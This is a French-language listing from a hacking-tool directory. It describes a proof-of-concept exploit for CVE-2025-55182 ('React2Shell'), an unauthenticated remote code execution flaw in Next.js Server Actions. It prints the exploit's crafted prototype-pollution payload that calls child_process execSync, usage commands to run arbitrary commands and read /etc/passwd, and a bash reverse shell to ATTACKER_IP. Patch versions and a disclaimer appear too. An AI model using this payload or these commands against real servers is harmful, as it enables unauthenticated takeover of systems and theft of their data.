Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nextjs-CVE-2025-55182 | Kitploit
Outils/GitHubGitHub/d0cnull/nextjs-cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubd0cnull/nextjs-cve-2025-55182

nextjs-CVE-2025-55182

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 / CVE-2025-66478 (React2Shell) - PoC d'exécution de code à distance (RCE) sur Next.js

Vulnérabilité critique dans les Server Actions de Next.js permettant une exécution de code à distance sans authentification via la désérialisation du React Flight Protocol

Vue d'ensemble

Ce dépôt contient une preuve de concept (PoC) pour la vulnérabilité RCE critique affectant les applications Next.js utilisant les Server Actions (React Server Functions).

DétailInformations
CVECVE-2025-55182 / CVE-2025-66478
SévéritéCritique (CVSS 10.0)
React affectéReact 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js affectéNext.js 15.x, 16.x, 14.3.0-canary.77+
NON affectéNext.js 14.x stable, 13.x, Pages Router, Edge Runtime
Next.js corrigé15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
React corrigé19.0.1, 19.1.2, 19.2.1
TypeExécution de code à distance (RCE)
Authentification requiseAucune

Description de la vulnérabilité

La vulnérabilité réside dans la manière dont le React Flight Protocol désérialise les chunks lors du traitement des Server Actions. Un attaquant peut exploiter la pollution de prototype via des données de formulaire spécialement conçues pour :

  1. Accéder au constructeur Function par traversée de la chaîne de prototypes (__proto__)
  2. Exécuter du code JavaScript arbitraire sur le serveur
  3. Obtenir une exécution de code à distance complète sans authentification

Cela se produit avant toute validation de la server action, ce qui rend l'exploitation possible sur toute application Next.js avec les Server Actions activés.

Applications affectées

Toute application Next.js est vulnérable si :

  • Elle utilise les Server Actions (par défaut dans l'App Router)
  • Elle exécute Next.js 15.x ou 16.x (ou 14.3.0-canary.77+)
  • Aucune mesure d'atténuation spécifique n'est en place

Utilisation

Prérequis

root@kitploit:~
pip install requests

Exécuter le PoC

root@kitploit:~
python3 poc.py <TARGET_URL> "<COMMAND>"

Exemples

root@kitploit:~
# Test command execution
python3 poc.py http://localhost:3000 "id"

# Read sensitive files
python3 poc.py http://localhost:3000 "cat /etc/passwd"

# Reverse shell (for authorized testing only)
python3 poc.py http://localhost:3000 "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Exemple de sortie

root@kitploit:~
$ python3 poc.py http://localhost:3000 "whoami"
500
0:{"a":"$@1","f":"","b":"development"}
1:E{"digest":"www-data","message":"NEXT_REDIRECT","stack":[],"env":"Server"}

La sortie de la commande apparaît dans le champ digest.

Détails techniques

L'exploit utilise le mécanisme de résolution des chunks du React Flight Protocol :

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('{cmd}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

Chaîne d'attaque :

  1. Traversée de prototype via $1:__proto__:then
  2. Accès au constructeur Function via $1:constructor:constructor
  3. Injection de code arbitraire via le champ _prefix
  4. Exécution du code lors de la désérialisation (pré-authentification)

Atténuation

Mettez à jour immédiatement :

root@kitploit:~
npm install next@latest
# or
pnpm update next

Versions corrigées : 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Remarque : Next.js 14.x stable et 13.x ne sont PAS vulnérables.

Avertissement

⚠️ Ce PoC est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.

L'accès non autorisé à des systèmes informatiques est illégal. Utilisez cet outil uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test. Les auteurs ne sont pas responsables de toute utilisation abusive.

Crédits

Basé sur les recherches originales de @msanft. Tout le crédit pour la découverte de la vulnérabilité et le PoC initial leur revient.

Références

  • Recherche originale CVE-2025-55182
  • Avis CVE officiel de Next.js
  • Analyse React2Shell par Wiz Research
  • Protocole React Flight
  • NIST NVD - CVE-2025-55182

Mots-clés

RCE Next.js, vulnérabilité Next.js, CVE-2025-55182, CVE-2025-66478, React2Shell, exploit React Server Components, RCE des Server Actions Next.js, pollution de prototype Next.js, vulnérabilité du React Flight Protocol, sécurité Next.js, exécution de code à distance Next.js, exploit PoC Next.js, vulnérabilité des Server Actions, RCE React RSC

Télécharger l’outil